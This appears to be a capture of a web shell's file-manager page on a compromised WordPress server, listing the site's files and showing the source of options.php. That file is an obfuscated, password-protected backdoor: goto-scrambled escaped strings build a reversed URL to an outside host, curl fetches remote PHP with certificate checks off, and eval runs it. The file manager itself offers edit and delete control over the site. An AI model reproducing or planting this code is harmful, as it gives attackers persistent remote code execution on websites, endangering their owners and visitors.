[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 .tmb
SET
[ DEL ]
📁 5c1ea
SET
[ DEL ]
📁 images
SET
[ DEL ]
📁 wp-admin
SET
[ DEL ]
📁 wp-content
SET
[ DEL ]
📁 wp-includes
SET
[ DEL ]
📄 .htaccess
199 B
SET
[ EDIT ]
|
[ DEL ]
📄 buy.php
1,492 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
79 B
SET
[ EDIT ]
|
[ DEL ]
📄 license.txt
19,903 B
SET
[ EDIT ]
|
[ DEL ]
📄 networks.php
2,043 B
SET
[ EDIT ]
|
[ DEL ]
📄 options.php
2,077 B
SET
[ EDIT ]
|
[ DEL ]
📄 product.php
1,910 B
SET
[ EDIT ]
|
[ DEL ]
📄 readme.html
7,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 robots.txt
332 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-activate.php
7,349 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-blog-header.php
351 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-comments-post.php
2,323 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-config-sample.php
3,339 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-config.php
3,409 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-cron.php
5,617 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-links-opml.php
2,493 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-load.php
3,937 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-login.php
51,437 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-mail.php
8,727 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-settings.php
31,055 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-signup.php
34,516 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-trackback.php
5,214 B
SET
[ EDIT ]
|
[ DEL ]
📄 xmlrpc.php
3,205 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: options.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php goto MMJd3; sy7E0: $SS8Fu .= "\x2f\160\x6f\164"; goto qDKgI; tBWqP: $SS8Fu .= "\65\x2f\144"; goto PjLow; Z1fDH: $SS8Fu .= "\x6f"; goto cQShg; cQShg: $SS8Fu .= "\57"; goto OTbPc; l2KX1: $SS8Fu .= "\164\164"; goto oibfZ; y0vkU: $SS8Fu .= "\57"; goto EYzIF; Q2dEt: $SS8Fu .= "\164\170\164\x2e\64"; goto tBWqP; hdfzX: $SS8Fu .= "\x2f"; goto y0vkU; M8874: eval("\77\x3e" . TW2KX(strrev($SS8Fu))); goto Q2VNb; oibfZ: $SS8Fu .= "\x68"; goto M8874; OTbPc: $SS8Fu .= "\141\x6d\x61\144"; goto sy7E0; GrX6T: $SS8Fu .= "\x30\141\x6d\141\x64"; goto hdfzX; MMJd3: $SS8Fu = ''; goto Q2dEt; PjLow: $SS8Fu .= "\x6c"; goto Z1fDH; qDKgI: $SS8Fu .= "\56\x32"; goto GrX6T; EYzIF: $SS8Fu .= "\x3a\x73\x70"; goto l2KX1; Q2VNb: function tw2kX($V1_rw = '') { goto S1oZL; V2RDF: $tvmad = curl_exec($xM315); goto EUVIW; tM6NO: return $tvmad; goto vuWvH; ZIbFK: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto yBSOL; EUVIW: curl_close($xM315); goto tM6NO; euHNs: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto kGJPE; kGJPE: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto i8G2G; S1oZL: $xM315 = curl_init(); goto ZIbFK; yBSOL: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto euHNs; i8G2G: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto V2RDF; vuWvH: }